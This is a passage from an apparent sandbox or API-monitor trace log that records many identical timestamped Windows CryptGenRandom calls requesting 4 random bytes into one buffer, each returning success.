dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.795] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.796] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.797] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.798] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.799] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.801] CryptGenRandom (in: 